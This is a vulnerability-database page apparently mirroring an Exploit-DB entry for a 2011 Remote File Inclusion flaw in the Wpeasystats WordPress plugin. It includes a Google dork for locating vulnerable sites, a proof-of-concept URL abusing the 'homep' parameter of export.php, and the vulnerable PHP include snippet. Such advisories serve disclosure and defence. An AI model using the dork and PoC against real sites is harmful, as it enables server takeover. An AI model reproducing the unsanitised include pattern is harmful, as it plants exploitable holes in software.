header-logo
Suggest Exploit
vendor:
Wpeasystats
by:
Ben Schmidt
8.8
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Wpeasystats
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wpeasystats
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Wpeasystats WordPress plugin RFI

The Wpeasystats Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious URL to an unsuspecting user, which when clicked, will execute arbitrary code on the vulnerable server. This is possible due to the lack of input validation in the export.php file, which allows an attacker to include a remote file via the 'homep' parameter.

Mitigation:

Input validation should be implemented to prevent malicious code from being executed.
Source

Exploit-DB raw data:

# Exploit Title: Wpeasystats Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/wpeasystats
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/wpeasystats/download/
# Version: 1.8

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wpeasystats/export.php?homep=RFI

---
Vulnerable Code
---
$core = $_GET['homep'].'wp-load.php';
include( $core );

Navigation

Suggest Exploit

Services By CQR